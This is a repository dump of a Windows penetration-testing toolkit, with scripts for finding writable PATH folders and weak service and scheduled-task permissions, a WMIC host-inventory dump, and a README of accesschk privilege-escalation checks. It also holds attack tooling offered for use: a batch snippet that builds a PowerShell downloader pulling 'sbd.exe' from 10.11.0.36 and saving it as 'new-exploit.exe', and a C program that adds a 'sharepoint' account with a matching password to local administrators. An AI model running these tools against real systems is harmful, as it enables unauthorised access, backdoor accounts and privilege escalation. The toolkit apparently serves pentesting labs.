Repository: ankh2054/windows-pentest Branch: master Commit: abc51e0b58de Files: 7 Total size: 7.7 KB
Directory structure:
gitextract__chh5jcc/
├── Powershell/
│   ├── folderperms.ps1
│   └── powershell_download_file.txt
├── README.md
├── adducer.c
├── icacls.bat
├── schcheck.bat
└── wmic-info

================================================
FILE CONTENTS
================================================

================================================
FILE: Powershell/folderperms.ps1
================================================
# Author : Parvez Anwar (@parvezghh)
# Date   : 17/11/13
#
# Purpose: find the directories on the current PATH that the running user can
# write to.  A dummy file is created in the current directory, copied into
# each PATH entry and removed again; one line is printed per entry
# (Access granted / Access denied / Folder missing).
#
# Run as (the file is folderperms.ps1 in this tree; the original note said
# folderperm.ps1):
#   powershell.exe -executionpolicy bypass -file folderperms.ps1
#
# Side effects worth knowing before running on a host: testfile.txt is
# created in the current directory and then in every writable PATH directory
# and deleted afterwards, so the probe leaves file create/delete events behind.

$numofpaths = 0          # highest array index the loop below visits (index, not count)
$countcopies = 0         # directories the copy succeeded in - incremented but never printed
$filetocopy = "testfile.txt"
$myarray = (gi env:path).value.split(';')   # PATH entries in order; may contain empty strings

Write-Host ""
Write-Host "[i] Number of folder paths :" $myarray.count

# If the last path entry ends in semi-colon, split() yields a trailing empty
# element; skip it so the loop does not probe "".
if ($myarray[$myarray.count-1] -eq "") {
    $numofpaths = $myarray.count - 2
} else {
    $numofpaths = $myarray.count - 1
}

# Create the dummy file in the current directory and confirm it exists before
# probing; bail out otherwise (nothing has been written anywhere else yet).
New-Item $filetocopy -type file | Out-Null
$FileExists = (Test-Path $filetocopy)
if (!($FileExists)) {
    Write-Host "[i] Dummy test file used to test access was not outputted:" $filetocopy
    exit
}

Write-Host "[i] Copying and removing test file to path folders where access is granted"
# Inclusive upper bound: $numofpaths is the last index to visit.
for($i=0; $i -le $numofpaths; $i++) {
    if (Test-Path -Path $myarray[$i]) {
        # Non-terminating errors from Copy-Item are collected in $errors instead
        # of being displayed; an empty $errors means the copy succeeded.
        Copy-Item $filetocopy $myarray[$i] -errorAction SilentlyContinue -errorVariable errors
        if ($errors.count -le 0) {
            Write-Host -foregroundColor Green " Access granted:" $myarray[$i]
            $countcopies = $countcopies + 1
            # Built by string concatenation: an entry that already ends in "\"
            # yields a doubled separator (tolerated by Windows path handling).
            $filetoremove = $myarray[$i] + "\" + $filetocopy
            # No -ErrorAction here: under the default error preference a failed
            # delete is reported and the script carries on, leaving
            # testfile.txt behind in that directory.
            Remove-Item $filetoremove
        } else {
            Write-Host -foregroundColor Red " Access denied :" $myarray[$i]
        }
    } else {
        Write-Host -foregroundColor Blue " Folder missing:" $myarray[$i]
    }
}

# Remove the local dummy file.
Remove-Item $filetocopy

================================================
FILE: Powershell/powershell_download_file.txt
================================================
echo $storageDir = $pwd > wget.ps1
echo
$webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.36/sbd.exe" >>wget.ps1
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

================================================
FILE: README.md
================================================
# windows-pentest
Windows Pentest Scripts and Tools.

#### wmic-info - Retrieve system info.
Uses WMIC to gather various important information about a Windows host and dump it to HTML.

#### icacls.bat - Weak permissions on Services.
* Script that queries all services.
* Removes default tasks and any Microsoft related.
* Then checks the BINARY_PATHS for any executables that have the Everyone or Usergroup set with RW access.

#### schcheck.bat - Weak permissions on scheduled task executables.
* Lists all scheduled tasks.
* Runs the list of executables against icacls and checks if any allow Everyone RW permissions.

#### adduser.c - Creates user and adds to administrator group.
* Creates a user called sharepoint with password sharepoint. Adds the user to the local administrators group.
* To cross compile on kali - i686-w64-mingw32-gcc -o useradd.exe useradd.c

#### Powershell/powershell_download_file.txt - Create wget powershell script to download external files.
* Copy file contents to clipboard using > `cat powershell_download_file.txt | xclip -selection clipboard`
* Paste into Windows command prompt which will create a **wget.ps1**
* `powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1`

#### Privelege/Accesschk-2003-xp.exe & accesschk-2008-vista.exe
##### Identify the level of access a particular user or group has to files, directories and Registry keys.
When executing any of the sysinternals tools for the first time the user will be presented with a GUI pop-up to accept the EULA. This is obviously a big problem, however we can add an extra command line flag to automatically accept the EULA.
accesschk.exe /accepteula

The following command reports the accesses that the Power Users account has to files and directories in \Windows\System32:

accesschk "power users" c:\windows\system32

This command shows which Windows services members of the Users group have write access to:

accesschk users -cw *

Check what access authenticated users have to services.

accesschk.exe -uwcqv "Authenticated Users" *

Check which Windows services a user called adam.dale has write access to:

accesschk.exe -uwcqv adam.dale *

Check to see what access permissions are set on the service called NetLogon

accesschk.exe -ucqv NetLogon

Find all weak folder permissions per drive.

accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\

Find all weak file permissions per drive.

accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*

To see what Registry keys under HKLM\CurrentUser a specific account has no access to:

accesschk -kns austin\mruss hklm\software

To see the security on the HKLM\Software key:

accesschk -k hklm\software

To see all files under \Users\Mark on Vista that have an explicit integrity level:

accesschk -e -s c:\users\mark

To see all global objects that Everyone can modify:

accesschk -wuo everyone \basednamedobjects

#### Powershell/folderperms.ps1
##### Checks for folders in the current PATH variable that are writeable for all authenticated users.
When new folders are created in the root they are writeable for all authenticated users by default. The “NT AUTHORITY\Authenticated Users:(I)(M)” entry gets added to the folder, where M stands for modify access. So any application that gets installed in the root can be tampered with by a non-admin user. The script checks for any of those folders that are writeable by authenticated users.
================================================
FILE: adducer.c
================================================
/* NOTE(review): the header name after #include was lost in extraction; the
 * trailing comment (system, NULL, EXIT_FAILURE) indicates <stdlib.h>. */
#include /* system, NULL, EXIT_FAILURE */

/* Creates a user called sharepoint with password sharepoint.  Adds the user to
 * the local administrators group.  Both steps go through net.exe in a single
 * system() call; "&" runs the second command regardless of the first one's
 * result.  Both net.exe commands produce account-management audit events
 * (user created, member added to a local group) when that auditing is enabled.
 *
 * NOTE(review): this file is adducer.c in the tree; the README and the compile
 * line below refer to useradd.c / adduser.c. */
/* To cross compile on kali - i686-w64-mingw32-gcc -o useradd.exe useradd.c */
int main ()
{
    int i;
    /* The system() status is stored in i but never examined: the program exits
     * 0 whether or not net.exe succeeded, and EXIT_FAILURE (named in the
     * include comment) is never used. */
    i=system ("net user sharepoint sharepoint /add & net localgroup administrators sharepoint /add");
    return 0;
}

================================================
FILE: icacls.bat
================================================
@echo off
REM Description: Script that queries all services and searches for executables that give the Everyone group RW access.
REM Type: Incorrect file permissions
REM Note: The ^ characters escape certain characters that break the FOR loop.
REM Note: tokens=1* - The value at the first delimiter and everything after.
REM
REM How the three nested loops fit together:
REM   1. "sc query state= all" piped through find SERVICE_NAME lists every
REM      service; with tokens=1* %%m holds "SERVICE_NAME:" and %%n the name.
REM   2. "sc qc NAME" piped through find BINARY_PATH_NAME fetches the binary
REM      path; with delims=": " %%r holds "BINARY_PATH_NAME" and %%s everything
REM      after the colon (the path plus any command-line arguments sc reports).
REM   3. findstr /V drops entries under %SystemRoot%\System32 and
REM      %SystemRoot%\SysWOW64; what remains (%%x) is handed to icacls.
REM
REM NOTE(review): the ACL output is printed raw - nothing here filters for
REM "Everyone" or a RW mask, so the weak-permission check described above is
REM left to the reader.  %%~s only strips quotes that enclose the whole value,
REM so a path followed by arguments is passed to icacls as a single name and
REM presumably fails to resolve - worth confirming on a live host.
for /f "tokens=1*" %%m in ('sc query state^= all ^| find "SERVICE_NAME"') do (
    for /f "tokens=1* delims=: " %%r in ('sc qc "%%~n" ^| find "BINARY_PATH_NAME"') do (
        for /f "delims=" %%x in ('echo(%%~s^| findstr /L /V /I /C:"%SystemRoot%\System32" /C:"%SystemRoot%\SysWOW64"') do (
            icacls "%%~x"
        )
    )
)

================================================
FILE: schcheck.bat
================================================
@echo off
REM - Lists all scheduled tasks. Runs the list of executables against icacls and checks if any allow Everyone RW permissions.
REM - Note: At present the script only ECHO's tasks.
REM
REM Outer loop: "schtasks /query /v /fo LIST" piped through find "Task To Run:"
REM yields one "Task To Run:   path" line per task; with delims=": " and
REM tokens=3* %%m holds "Run" and %%n the path (plus arguments) after the colon.
REM Inner loop: findstr /V discards COM-handler tasks, "multiple" actions,
REM anything under %SystemRoot% and shutdown tasks; delims=? leaves %%x as the
REM whole line unless a "?" occurs in it.
REM
REM NOTE(review): icacls is never invoked here despite the description - the
REM body only echoes.  Also, cmd applies the results.txt redirection on the
REM ECHO line before ECHO runs, so that line most likely writes the path
REM followed by the word REM into results.txt, overwriting the file on every
REM iteration, rather than being commented out.
for /f "tokens=3* delims=: " %%m in ('schtasks /query /v /fo LIST ^| find "Task To Run:"') do (
    for /f "tokens=1* delims=?" %%x in ('echo(%%~n^| findstr /L /V /I /C:"COM handler" /C:"multiple" /C:"%SystemRoot%" /C:"shutdown"') do (
        ECHO %%~x REM > results.txt
    )
)

================================================
FILE: wmic-info
================================================
REM Host inventory script.  The %%A and %var% forms are batch-file syntax, so
REM this is meant to run as a .bat/.cmd file rather than be pasted into an
REM interactive prompt.  It locates the WMIC HTML stylesheet (htable.xsl)
REM under %WINDIR%\system32 and renders a series of WMIC queries through it
REM into out.html.
REM NOTE(review): every line appends to out.html, so the report grows on each
REM run - remove or rename it between runs for a fresh copy.  If dir finds
REM more than one htable.xsl the last match wins, since set runs once per hit.
for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html